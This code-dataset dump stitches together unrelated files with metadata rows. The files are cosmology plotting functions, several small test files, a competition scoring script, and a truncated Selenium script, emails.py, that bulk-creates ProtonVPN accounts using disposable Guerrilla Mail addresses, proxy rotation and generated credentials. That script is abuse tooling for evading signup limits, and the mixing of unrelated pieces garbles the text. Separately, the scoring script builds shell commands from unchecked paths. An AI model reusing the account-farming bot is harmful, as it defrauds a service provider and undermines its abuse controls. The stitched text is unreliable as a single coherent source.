plt.subplots_adjust(left=.09, right=.99, bottom=.07, top=.97, hspace=0)
# Plot all power spectra and the difference from the fiducial model
cl_fac = ell * (ell + 1) / (2 * np.pi)
for cl, dist_sig in zip(cls_, dist_sigma):
ax[0].plot(ell, cl_fac * cl, alpha=.5, color=colour.to_rgba(dist_sig))
ax[1].plot(ell, (cl - fid_cl) / fid_cl_err, alpha=.5, color=colour.to_rgba(dist_sig))
# Add a few cosmic variance error bars
err_ell = np.array([500, 1000, 1500, 2000])
err_ell_idx = err_ell - lmin
ax[0].errorbar(err_ell, cl_fac[err_ell_idx] * fid_cl[err_ell_idx],
yerr=(cl_fac[err_ell_idx] * 0.5 * fid_cl_err[err_ell_idx]), lw=2, c='black', zorder=5, capsize=5,
ls='None', label=r'Cosmic variance + noise $\sqrt{Var (C_\ell)}$')
# Labels, legend and colour bar
ax[1].set_xlabel(r'$\ell$')
ax[0].set_ylabel(r'$C_\ell \times \ell (\ell + 1) ~ / ~ 2 \pi$')
ax[1].set_ylabel(r'$(C_\ell - C_\ell^\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(C_\ell)}$')
ax[0].ticklabel_format(axis='y', style='sci', scilimits=(0, 0))
fig.align_ylabels()
ax[0].legend(frameon=False, title='Bin 1 shear')
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n', rotation=-90,
labelpad=25)
if plot_save_dir is not None:
plot_save_path = os.path.join(plot_save_dir, 'cl_perl.pdf')
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
# Calculate theta range
theta_bin_edges = np.logspace(np.log10(theta_min), np.log10(theta_max), n_theta_bin + 1)
# Generate Cl -> binned CF matrix (for xi_plus)
_, cl2cf_22plus, _ = like_cf.get_cl2cf_matrices(theta_bin_edges, lmin, l_extrap_to)
# Extrapolate fiducial power spectrum up to l_extrap_to and zero it below lmax
fid_cl = cls_nonoise[fid_idx, :]
extrap_mat = get_extrap_mat(lmin, lmax, l_extrap_to)
fid_cl_extrap = extrap_mat @ fid_cl
# Transform it with transmat to obtain stabilisation vector
stabl_vec = cl2cf_22plus @ fid_cl_extrap
# Now trim transmat to lmax
cl2cf_22plus = cl2cf_22plus[:, :(lmax - lmin + 1)]
# Obtain fiducial CF
fid_cf = cl2cf_22plus @ fid_cl + stabl_vec
# Calculate error on fiducial CF, including noise
fid_cl_var = 2 * fid_cl ** 2 / (2 * ell + 1)
fid_cf_cov_nonoise = np.einsum('il,jl,l->ij', cl2cf_22plus, cl2cf_22plus, fid_cl_var)
# Noise contribution
survey_area_sterad = survey_area_sqdeg * (DEG_TO_RAD ** 2)
gals_per_sterad = gals_per_sqarcmin * (60 / DEG_TO_RAD) ** 2
cos_theta = np.cos(theta_bin_edges)
bin_area_new = 2 * np.pi * -1 * np.diff(cos_theta)
npairs = 0.5 * survey_area_sterad * bin_area_new * (gals_per_sterad ** 2) # Friedrich et al. eq 65
fid_cf_noise_var = 2 * sigma_e ** 4 / npairs
fid_cf_err = np.sqrt(np.diag(fid_cf_cov_nonoise) + fid_cf_noise_var)
# Apply trimmed transmat to each power spectrum and add stabilisation vector, and plot
fig, ax = plt.subplots(nrows=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
plt.subplots_adjust(left=.09, right=.99, bottom=.07, top=.97, hspace=0)
bin_edges_deg = np.degrees(theta_bin_edges)
bin_centres_deg = bin_edges_deg[:-1] + 0.5 * np.diff(bin_edges_deg)
for cl, dist_sig in zip(cls_nonoise, dist_sigma):
cf = cl2cf_22plus @ cl + stabl_vec
cf_diff = (cf - fid_cf) / fid_cf_err
line_args = {'alpha': .5, 'color': colour.to_rgba(dist_sig)}
ax[0].step(bin_edges_deg, np.pad(cf, (0, 1), mode='edge'), where='post', **line_args)
ax[1].step(bin_edges_deg, np.pad(cf_diff, (0, 1), mode='edge'), where='post', **line_args)
# Add error bars
bin_centres_deg = bin_edges_deg[:-1] + 0.5 * np.diff(bin_edges_deg)
ax[0].errorbar(bin_centres_deg, fid_cf, yerr=(0.5 * fid_cf_err), lw=2, c='black', zorder=5, capsize=5,
ls='None', label=r'Cosmic variance + noise $\sqrt{Var (\xi+)}$')
# Labels, legend and colour bar
plt.xscale('log')
ax[1].set_xlabel(r'$\theta$ (deg)')
ax[0].set_ylabel(r'$\xi^+ (\theta)$')
ax[1].set_ylabel(r'$(\xi^+ - \xi^+_\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(\xi^+)}$')
fig.align_ylabels()
ax[0].legend(frameon=False, title='Bin 1 shear')
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n(from power spectrum)', rotation=-90,
labelpad=25)
if plot_save_dir is not None:
plot_save_path = os.path.join(plot_save_dir, 'cf_perbin.pdf')
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
def plot_cf_nbin(diag_she_cl_path, lmin, lmax, theta_min, theta_max, n_bin_1, n_bin_2, survey_area_sqdeg,
gals_per_sqarcmin, sigma_e, l_extrap_to=60000, plot_save_path=None):
"""
Plots signal-to-noise per bin for the full-sky correlation function for two numbers of bins side-by-side, using data
produced with ``param_grids.load_diagonal_shear_cl``.
Args:
diag_she_cl_path (str): Path to output of ``param_grids.load_diagonal_shear_cl``.
lmin (int): Minimum l.
lmax (int): Maximum l.
theta_min (float): Minimum theta.
theta_max (float): Maximum theta.
n_bin_1 (int): Number of theta bins in the left panel.
n_bin_2 (int): Number of theta bins in the right panel.
survey_area_sqdeg (float): Survey area in square degrees.
gals_per_sqarcmin (float): Average number of galaxies per square arcminute per redshift bin.
sigma_e (float): Intrinsic ellipticity dispersion per component.
l_extrap_to (int, optional): The power spectrum is extrapolated to this l prior to the Cl-to-CF transform for
stability, using a l(l+1)-weighted linear extrapolation. Default 60000.
plot_save_path (str, optional): Path to save the plot, if supplied. If not supplied, plot is displayed.
"""
# Load parameters and power spectra
with np.load(diag_she_cl_path) as data:
w0 = data['w0']
wa = data['wa']
cls_nonoise = data['shear_cl_bin_1_1']
# Do some consistency checks
n_samp = len(w0)
assert w0.shape == (n_samp,)
assert wa.shape == (n_samp,)
# Identify fiducial Cls
fid_idx = np.squeeze(np.argwhere(np.isclose(w0, -1) & np.isclose(wa, 0)))
ell = np.arange(lmin, lmax + 1)
# Calculate distance from (-1, 0) with a direction (bottom left being negative)
dist = np.sqrt((w0 - -1) ** 2 + (wa - 0) ** 2) * np.sign(wa)
# Convert distance to units of sigma using the fact that we have 21 points inside +/- 9 sig
# (on the w0-wa posterior from lmax 2000 power spectrum)
onesig = np.mean(np.diff(dist)) * (21 - 1) / 18
dist_sigma = dist / onesig
# Use a diverging colour map over this range
max_dist_sigma = np.amax(np.abs(dist_sigma))
norm = matplotlib.colors.Normalize(-max_dist_sigma, max_dist_sigma)
colour = matplotlib.cm.ScalarMappable(norm, cmap='Spectral')
# Calculate theta range
theta_bin_edges_1 = np.logspace(np.log10(theta_min), np.log10(theta_max), n_bin_1 + 1)
theta_bin_edges_2 = np.logspace(np.log10(theta_min), np.log10(theta_max), n_bin_2 + 1)
# Generate Cl -> binned CF matrix (for xi_plus)
_, cl2cf_22plus_1, _ = like_cf.get_cl2cf_matrices(theta_bin_edges_1, lmin, l_extrap_to)
_, cl2cf_22plus_2, _ = like_cf.get_cl2cf_matrices(theta_bin_edges_2, lmin, l_extrap_to)
# Extrapolate fiducial power spectrum up to l_extrap_to and zero it below lmax
fid_cl = cls_nonoise[fid_idx, :]
extrap_mat = get_extrap_mat(lmin, lmax, l_extrap_to)
fid_cl_extrap = extrap_mat @ fid_cl
# Transform it with transmat to obtain stabilisation vector
stabl_vec_1 = cl2cf_22plus_1 @ fid_cl_extrap
stabl_vec_2 = cl2cf_22plus_2 @ fid_cl_extrap
# Now trim transmat to lmax
cl2cf_22plus_1 = cl2cf_22plus_1[:, :(lmax - lmin + 1)]
cl2cf_22plus_2 = cl2cf_22plus_2[:, :(lmax - lmin + 1)]
# Obtain fiducial CF
fid_cf_1 = cl2cf_22plus_1 @ fid_cl + stabl_vec_1
fid_cf_2 = cl2cf_22plus_2 @ fid_cl + stabl_vec_2
# Calculate error on fiducial CF, including noise
fid_cl_var = 2 * fid_cl ** 2 / (2 * ell + 1)
fid_cf_cov_nonoise_1 = np.einsum('il,jl,l->ij', cl2cf_22plus_1, cl2cf_22plus_1, fid_cl_var)
fid_cf_cov_nonoise_2 = np.einsum('il,jl,l->ij', cl2cf_22plus_2, cl2cf_22plus_2, fid_cl_var)
# Noise contribution
survey_area_sterad = survey_area_sqdeg * (DEG_TO_RAD ** 2)
gals_per_sterad = gals_per_sqarcmin * (60 / DEG_TO_RAD) ** 2
cos_theta_1 = np.cos(theta_bin_edges_1)
cos_theta_2 = np.cos(theta_bin_edges_2)
bin_area_1 = 2 * np.pi * -1 * np.diff(cos_theta_1)
bin_area_2 = 2 * np.pi * -1 * np.diff(cos_theta_2)
npairs_1 = 0.5 * survey_area_sterad * bin_area_1 * (gals_per_sterad ** 2) # Friedrich et al. eq 65
npairs_2 = 0.5 * survey_area_sterad * bin_area_2 * (gals_per_sterad ** 2)
fid_cf_noise_var_1 = 2 * sigma_e ** 4 / npairs_1
fid_cf_noise_var_2 = 2 * sigma_e ** 4 / npairs_2
fid_cf_err_1 = np.sqrt(np.diag(fid_cf_cov_nonoise_1) + fid_cf_noise_var_1)
fid_cf_err_2 = np.sqrt(np.diag(fid_cf_cov_nonoise_2) + fid_cf_noise_var_2)
# Prepare plot
plt.rcParams.update({'font.size': 13})
fig, ax = plt.subplots(nrows=2, ncols=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
plt.subplots_adjust(left=.07, right=1, bottom=.07, top=.97, hspace=0, wspace=.12)
# Apply trimmed transmat to each power spectrum and add stabilisation vector, and plot
bin_edges_deg_1 = np.degrees(theta_bin_edges_1)
bin_edges_deg_2 = np.degrees(theta_bin_edges_2)
for cl, dist_sig in zip(cls_nonoise, dist_sigma):
cf_1 = cl2cf_22plus_1 @ cl + stabl_vec_1
cf_2 = cl2cf_22plus_2 @ cl + stabl_vec_2
cf_diff_1 = (cf_1 - fid_cf_1) / fid_cf_err_1
cf_diff_2 = (cf_2 - fid_cf_2) / fid_cf_err_2
step_args = {'where': 'post', 'alpha': .5, 'color': colour.to_rgba(dist_sig)}
ax[0, 0].step(bin_edges_deg_1, np.pad(cf_1, (0, 1), mode='edge'), **step_args)
ax[0, 1].step(bin_edges_deg_2, np.pad(cf_2, (0, 1), mode='edge'), **step_args)
ax[1, 0].step(bin_edges_deg_1, np.pad(cf_diff_1, (0, 1), mode='edge'), **step_args)
ax[1, 1].step(bin_edges_deg_2, np.pad(cf_diff_2, (0, 1), mode='edge'), **step_args)
# Add error bars
log_bin_edges_deg_1 = np.log(bin_edges_deg_1)
log_bin_edges_deg_2 = np.log(bin_edges_deg_2)
bin_log_centres_deg_1 = np.exp(log_bin_edges_deg_1[:-1] + 0.5 * np.diff(log_bin_edges_deg_1))
bin_log_centres_deg_2 = np.exp(log_bin_edges_deg_2[:-1] + 0.5 * np.diff(log_bin_edges_deg_2))
error_args = {'lw': 2, 'c': 'black', 'zorder': 5, 'capsize': 5, 'ls': 'None',
'label': r'Cosmic variance + noise $\sqrt{Var (\xi+)}$'}
ax[0, 0].errorbar(bin_log_centres_deg_1, fid_cf_1, yerr=(0.5 * fid_cf_err_1), **error_args)
ax[0, 1].errorbar(bin_log_centres_deg_2, fid_cf_2, yerr=(0.5 * fid_cf_err_2), **error_args)
# Log scale and axis labels
plt.xscale('log')
ax[1, 0].set_xlabel(r'$\theta$ (deg)')
ax[1, 1].set_xlabel(r'$\theta$ (deg)')
ax[0, 0].set_ylabel(r'$\xi^+ (\theta)$')
ax[1, 0].set_ylabel(r'$(\xi^+ - \xi^+_\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(\xi^+)}$')
fig.align_ylabels()
# Panel labels
annot_args = {'xy': (.95, .95), 'xycoords': 'axes fraction', 'ha': 'right', 'va': 'top', 'fontsize': 14}
ax[0, 0].annotate(f'{n_bin_1} $\\theta$ bin{"s" if n_bin_1 > 1 else ""}', **annot_args)
ax[0, 1].annotate(f'{n_bin_2} $\\theta$ bin{"s" if n_bin_2 > 1 else ""}', **annot_args)
# Colour bar
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n(from power spectrum)', rotation=-90,
labelpad=25)
if plot_save_path is not None:
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
def get_extrap_mat(lmin, lmax_in, l_extrap_to):
"""
Generate the power spectrum extrapolation matrix, which is used to extrapolate the power spectrum to high l
to stabilise the Cl-to-CF transform.
This matrix should be (pre-)multiplied by the fiducial power spectrum, then all (pre-)multiplied by the Cl-to-CF
transformation matrix, to produce a 'stabilisation vector' which can be added to any correlation function vector to
stabilise it. Generally the same stabilisation vector should be used for all points in parameter space, to avoid
biases. Note that the extrapolation matrix zeros all power below lmax_in, i.e. it does not give a concatenation of
the original power spectrum and the extrapolated section, but just solely the extrapolated section.
The extrapolation is linear with an l(l+1) weighting, achieved using a block matrix. See extrapolation_equations.pdf
for the derivation of its elements.
Args:
lmin (int): Minimum l in the power spectrum.
lmax_in (int): Maximum l prior to extrapolation.
l_extrap_to (int): Maximum l to which to extrapolate.
Returns:
2D numpy array: Extrapolation matrix.
"""
zero_top = np.zeros((lmax_in - lmin + 1, lmax_in - lmin + 1))
zero_bottom = np.zeros((l_extrap_to - lmax_in, lmax_in - lmin + 1 - 2))
ell_extrap = np.arange(lmax_in + 1, l_extrap_to + 1)
penul_col = (-ell_extrap + lmax_in) * lmax_in * (lmax_in - 1) / (ell_extrap * (ell_extrap + 1))
final_col = (ell_extrap - lmax_in + 1) * lmax_in * (lmax_in + 1) / (ell_extrap * (ell_extrap + 1))
extrap_mat = np.block([[zero_top], [zero_bottom, penul_col[:, np.newaxis], final_col[:, np.newaxis]]])
return extrap_mat
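A small behaviour check of get_extrap_mat with toy numbers (an illustrative sketch, not values used in the analysis). For a spectrum with C_l = 1/(l(l+1)), the weighted quantity l(l+1)C_l is constant, so the l(l+1)-weighted linear extrapolation must reproduce 1/(l(l+1)) exactly above lmax_in, while the rows covering the original range are zeroed:

import numpy as np

lmin, lmax_in, l_extrap_to = 2, 10, 20
ell = np.arange(lmin, lmax_in + 1)
cl = 1.0 / (ell * (ell + 1))  # toy spectrum with constant l(l+1)*C_l

extrap_mat = get_extrap_mat(lmin, lmax_in, l_extrap_to)
cl_extrap = extrap_mat @ cl

assert extrap_mat.shape == (l_extrap_to - lmin + 1, lmax_in - lmin + 1)
assert np.allclose(cl_extrap[:lmax_in - lmin + 1], 0)  # input range is zeroed
ell_ext = np.arange(lmax_in + 1, l_extrap_to + 1)
assert np.allclose(cl_extrap[lmax_in - lmin + 1:], 1.0 / (ell_ext * (ell_ext + 1)))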
| 47.862637
| 120
| 0.662438
| 2,852
| 17,422
| 3.787868
| 0.143759
| 0.024438
| 0.021383
| 0.009997
| 0.735722
| 0.662131
| 0.626215
| 0.60585
| 0.533555
| 0.503379
| 0
| 0.038998
| 0.21404
| 17,422
| 363
| 121
| 47.99449
| 0.749945
| 0.312421
| 0
| 0.415385
| 0
| 0.015385
| 0.095817
| 0.007015
| 0
| 0
| 0
| 0
| 0.025641
| 1
| 0.015385
| false
| 0
| 0.030769
| 0
| 0.051282
| 0.015385
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c821672ff666bf16f14e39715a6449abc332ecc
| 1,182
|
py
|
Python
|
tests/integration/test_use_cases/test_18_confirm_purchase.py
|
datacraft-dsc/starfish-py
|
95ff24410f056e8e2d313c3af97439fe003e294a
|
[
"Apache-2.0"
] | 4
|
2019-02-08T03:47:36.000Z
|
2019-10-17T21:45:23.000Z
|
tests/integration/test_use_cases/test_18_confirm_purchase.py
|
datacraft-dsc/starfish-py
|
95ff24410f056e8e2d313c3af97439fe003e294a
|
[
"Apache-2.0"
] | 81
|
2019-02-09T01:01:51.000Z
|
2020-07-01T08:35:07.000Z
|
tests/integration/test_use_cases/test_18_confirm_purchase.py
|
oceanprotocol/ocean-py
|
318ad0de2519e61d0a301c040a48d1839cd82425
|
[
"Apache-2.0"
] | 1
|
2021-01-28T12:14:03.000Z
|
2021-01-28T12:14:03.000Z
|
"""
test_18_confirm_purchase
As a developer building a service provider Agent for Ocean,
I need a way to confirm if an Asset has been successfully purchased so that
I can determine whether to serve the asset to a given requestor
"""
import secrets
import logging
import json
from starfish.asset import DataAsset
def test_18_confirm_purchase(resources, config, remote_agent_surfer, convex_accounts):
purchaser_account = convex_accounts
test_data = secrets.token_bytes(1024)
asset_data = DataAsset.create('TestAsset', test_data)
asset = remote_agent_surfer.register_asset(asset_data)
assert(asset)
listing = remote_agent_surfer.create_listing(resources.listing_data, asset.did)
listing.set_published(True)
logging.debug("confirm_purchase for listingid: " + listing.listing_id)
response = remote_agent_surfer.update_listing(listing)
logging.debug("update_listing response: " + str(response))
assert(response)
status = 'ordered'
purchase = remote_agent_surfer.purchase_asset(listing, purchaser_account, None, status)
assert(purchase['listingid'] == listing.listing_id)
assert(purchase['status'] == status)
| 35.818182
| 91
| 0.764805
| 154
| 1,182
| 5.642857
| 0.461039
| 0.063291
| 0.097814
| 0.048331
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008032
| 0.15736
| 1,182
| 32
| 92
| 36.9375
| 0.864458
| 0.188663
| 0
| 0
| 0
| 0
| 0.094218
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.05
| false
| 0
| 0.2
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c8705d494d8a3a52f621df0705a17180cb44780
| 1,230
|
py
|
Python
|
blaze/expr/tests/test_datetime.py
|
vitan/blaze
|
0cddb630ad1cf6be3967943337529adafa006ef5
|
[
"BSD-3-Clause"
] | 1
|
2015-11-06T00:46:56.000Z
|
2015-11-06T00:46:56.000Z
|
blaze/expr/tests/test_datetime.py
|
vitan/blaze
|
0cddb630ad1cf6be3967943337529adafa006ef5
|
[
"BSD-3-Clause"
] | null | null | null |
blaze/expr/tests/test_datetime.py
|
vitan/blaze
|
0cddb630ad1cf6be3967943337529adafa006ef5
|
[
"BSD-3-Clause"
] | null | null | null |
from blaze.expr import TableSymbol
from blaze.expr.datetime import isdatelike
from blaze.compatibility import builtins
from datashape import dshape
import pytest
def test_datetime_dshape():
t = TableSymbol('t', '5 * {name: string, when: datetime}')
assert t.when.day.dshape == dshape('5 * int32')
assert t.when.date.dshape == dshape('5 * date')
def test_date_attribute():
t = TableSymbol('t', '{name: string, when: datetime}')
expr = t.when.day
assert eval(str(expr)).isidentical(expr)
def test_invalid_date_attribute():
t = TableSymbol('t', '{name: string, when: datetime}')
with pytest.raises(AttributeError):
t.name.day
def test_date_attribute_completion():
t = TableSymbol('t', '{name: string, when: datetime}')
assert 'day' in dir(t.when)
assert 'day' not in dir(t.name)
assert not builtins.all([x.startswith('__') and x.endswith('__')
for x in dir(t.name)])
def test_datetime_attribute_name():
t = TableSymbol('t', '{name: string, when: datetime}')
assert 'when' in t.when.day._name
def test_isdatelike():
assert not isdatelike('int32')
assert isdatelike('?date')
assert not isdatelike('{is_outdated: bool}')
| 29.285714
| 68
| 0.669919
| 165
| 1,230
| 4.872727
| 0.266667
| 0.043532
| 0.080846
| 0.136816
| 0.256219
| 0.221393
| 0.221393
| 0.221393
| 0.119403
| 0
| 0
| 0.007021
| 0.189431
| 1,230
| 41
| 69
| 30
| 0.799398
| 0
| 0
| 0.133333
| 0
| 0
| 0.178049
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.2
| false
| 0
| 0.166667
| 0
| 0.366667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c8be6bc259868341293934801c28e199c01bfba
| 1,539
|
py
|
Python
|
dac4automlcomp/score.py
|
automl/dac4automlcomp
|
f1a8b4e2f0fc85ad19b86aa41856496732fed901
|
[
"Apache-2.0"
] | null | null | null |
dac4automlcomp/score.py
|
automl/dac4automlcomp
|
f1a8b4e2f0fc85ad19b86aa41856496732fed901
|
[
"Apache-2.0"
] | null | null | null |
dac4automlcomp/score.py
|
automl/dac4automlcomp
|
f1a8b4e2f0fc85ad19b86aa41856496732fed901
|
[
"Apache-2.0"
] | null | null | null |
import argparse
import os
import time
import gym
import warnings
# Parts of the code are inspired by the AutoML3 competition
from sys import argv, path
from os import getcwd
from os.path import join
verbose = True
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="The experiment runner for the DAC4RL track."
)
parser.add_argument(
"-t",
"--competition-track",
choices=['dac4sgd', 'dac4rl'],
help="DAC4SGD or DAC4RL",
default="dac4rl",
)
parser.add_argument(
"-i",
"--input-dir",
type=str,
default="",
help="",
)
parser.add_argument(
"-o",
"--output-dir",
type=str,
default="",
help="",
)
root_dir = getcwd()
print("Working directory:", root_dir)
args, unknown = parser.parse_known_args()
output_dir = os.path.abspath(args.output_dir)
if verbose:
print("Using output_dir: " + output_dir)
if not os.path.exists(args.output_dir):
print("Path not found:", args.output_dir)
os.makedirs(args.output_dir)
if os.path.exists(args.output_dir):
print("Output directory contents:")
os.system("ls -lR " + args.output_dir)
if os.path.exists(args.input_dir):
os.system("cp " + args.input_dir + "/res/scores.txt " + args.output_dir)
else:
print("No results from ingestion!")
with open(args.output_dir + '/scores.txt', 'r') as fh:
print(fh.readlines())
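For reference, a hypothetical invocation of the scorer above; the directory names are placeholders, not taken from the competition docs:

# python score.py -t dac4rl -i ingestion_output -o scoring_output
# -> copies ingestion_output/res/scores.txt into scoring_output/ and echoes it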
| 23.676923
| 80
| 0.59974
| 191
| 1,539
| 4.685864
| 0.424084
| 0.12067
| 0.130726
| 0.050279
| 0.165363
| 0.118436
| 0.118436
| 0.069274
| 0
| 0
| 0
| 0.006233
| 0.270305
| 1,539
| 64
| 81
| 24.046875
| 0.790739
| 0.037037
| 0
| 0.173077
| 0
| 0
| 0.186739
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.153846
| 0
| 0.153846
| 0.115385
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c8d359a9fdb99a983fada9faf82eacea1c12723
| 11,067
|
py
|
Python
|
emails.py
|
kotx/proton-vpn-account-generator
|
8f99093cdf1d0244a91493a09d2e37a02721d144
|
[
"MIT"
] | 5
|
2020-04-03T13:57:07.000Z
|
2022-03-11T03:20:14.000Z
|
emails.py
|
kotx/proton-vpn-account-generator
|
8f99093cdf1d0244a91493a09d2e37a02721d144
|
[
"MIT"
] | 2
|
2020-10-15T20:26:44.000Z
|
2021-05-29T09:36:10.000Z
|
emails.py
|
kotx/proton-vpn-account-generator
|
8f99093cdf1d0244a91493a09d2e37a02721d144
|
[
"MIT"
] | 5
|
2020-04-03T13:57:08.000Z
|
2022-01-23T08:52:16.000Z
|
# This project is in its early stages of development.
# Working on new features and a main menu.
# Any questions or suggestions? Please mail: hendriksdevmail@gmail.com
# Version: 1.0.0
from selenium import webdriver
from colorama import Fore, Back, Style
import warnings
import time
import random
import string
import urllib.request
import requests
import csv
import sys
from proxyscrape import create_collector
import os
clear = lambda: os.system('clear')
clear()
collector = create_collector('my-collector', 'https')
print ('\033[31m' + """\
____ __ __ ___ _ __
/ __ \_________ / /_____ ____ / |/ /___ _(_) /
/ /_/ / ___/ __ \/ __/ __ \/ __ \/ /|_/ / __ `/ / /
/ ____/ / / /_/ / /_/ /_/ / / / / / / / /_/ / / /
/_/ /_/ \____/\__/\____/_/ /_/_/ /_/\__,_/_/_/
___ __
/ | ______________ __ ______ / /_
/ /| |/ ___/ ___/ __ \/ / / / __ \/ __/
/ ___ / /__/ /__/ /_/ / /_/ / / / / /_
/_/ |_\___/\___/\____/\__,_/_/ /_/\__/
______ __
/ ____/_______ ____ _/ /_____ _____
/ / / ___/ _ \/ __ `/ __/ __ \/ ___/
/ /___/ / / __/ /_/ / /_/ /_/ / /
\____/_/ \___/\__,_/\__/\____/_/
""" + '\033[0m')
time.sleep(15)
restart = 2
while (restart > 1):
    # Pick an email for Verification. Replace 'YourEmail@Mail.com' with an email address. (You can use 10min mail for this)
    # verifymail = input('\033[31m' + "Enter Email Address for Verification: " + '\033[0m')
verifymail = ''
# f = open('./input_emails.txt')
# verifymail = f.readline().trim()
# verifymail = 'itlammhewuicxfmhco@ttirv.org'
    # Pick an email for Notification. Replace 'YourEmail@Mail.com' with an email address. (You can use 10min mail for this)
    # notifymail = input('\033[31m' + "Enter Email Address for Recovery: " + '\033[0m')
notifymail = ''
# notifymail = 'itlammhewuicxfmhco@ttirv.org'
proxy_status = "false"
while (proxy_status == "false" and False):
# Retrieve only 'us' proxies
proxygrab = collector.get_proxy({'code': ('in')})
proxy = ("{}:{}".format(proxygrab.host, proxygrab.port))
print ('\033[31m' + "Proxy:", proxy + '\033[0m')
try:
proxy_host = proxygrab.host
proxy_port = proxygrab.port
proxy_auth = ":"
proxies = {'http':'http://{}@{}:{}/'.format(proxy_auth, proxy_host, proxy_port)}
requests.get("http://example.org", proxies=proxies, timeout=1.5)
except OSError:
print ('\033[31m' + "Proxy Connection error!" + '\033[0m')
time.sleep(1)
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
proxy_status = "false"
else:
print ('\033[31m' + "Proxy is working..." + '\033[0m')
time.sleep(1)
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
proxy_status = "true"
else:
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.select import Select
warnings.filterwarnings("ignore", category=DeprecationWarning)
options = Options()
email_driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=options)
email_url = 'https://www.guerrillamail.com/'
email_driver.get(email_url)
time.sleep(4)
# # print(driver.find_element_by_id('inbox-id').text)
        email = email_driver.find_element_by_id('inbox-id').text + '@'
domain_name = Select(email_driver.find_element_by_id('gm-host-select')).first_selected_option.text
# # domain_name = email_driver.find_element_by_id('gm-host-select').text
email += domain_name
# print(domain_name)
print(email)
# f = open('./input_emails.txt', 'w')
# f.write(email)
verifymail = email
# email_driver.find_element_by_partial_link_text('verification').click()
# options.add_argument('--proxy-server={}'.format(proxy))
# Change Path to Chrome Driver Path (or move your ChromeDriver into the project folder)
driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=options)
# url = 'http://protonmail.com/signup'
url = 'http://account.protonvpn.com/signup'
#url =
def randomStringDigits(stringLength=13):
# Generate a random string of letters and digits
lettersAndDigits = string.ascii_letters + string.digits
return ''.join(random.choice(lettersAndDigits) for i in range(stringLength))
def getUserName():
f = open('lastused.txt')
val = int(f.readline())
f.close()
f = open('lastused.txt', 'w')
val += 1
f.write(str(val))
return 'wowmainia'+str(val - 1)
rngusername = getUserName()
rngpassword = randomStringDigits(15)
driver.get(url)
# time.sleep(10)
# driver.find_element_by_class_name('pm-button w100 mtauto pm-button--primaryborder').click()
# driver.find_element_by_link_text("Get Free").click()
# driver.find_element_by_xpath("/html/body/div[1]/main/main/div/div[4]/div[1]/div[3]/button").click()
while True:
try:
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div:nth-child(5) > div:nth-child(1) > div.flex-item-fluid-auto.pt1.pb1.flex.flex-column > button").click()
break
except:
time.sleep(1)
continue
# driver.find_element_by_id('freePlan').click()
# driver.find_element_by_css_selector("#username").send_keys(rngusername)
# time.sleep(4)
# driver.switch_to_frame(0)
# time.sleep(3)
# driver.find_element_by_id('username').send_keys(rngusername)
# time.sleep(1)
# driver.find_element_by_css_selector("#username").send_keys(rngusername)
while True:
try:
driver.find_element_by_id("username").send_keys(rngusername)
driver.find_element_by_id("password").send_keys(rngpassword)
driver.find_element_by_id("passwordConfirmation").send_keys(rngpassword)
driver.find_element_by_id("email").send_keys(verifymail)
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div.pt2.mb2 > div > div:nth-child(1) > form > div:nth-child(3) > div > button").click()
break
except:
time.sleep(1)
# driver.switch_to.default_content()
# time.sleep(1)
# driver.find_element_by_id('password').send_keys(rngpassword)
# time.sleep(1)
# driver.find_element_by_id('passwordc').send_keys(rngpassword)
# time.sleep(1)
# driver.switch_to_frame(1)
# time.sleep(1)
# driver.find_element_by_id('notificationEmail').send_keys(notifymail)
while True:
try:
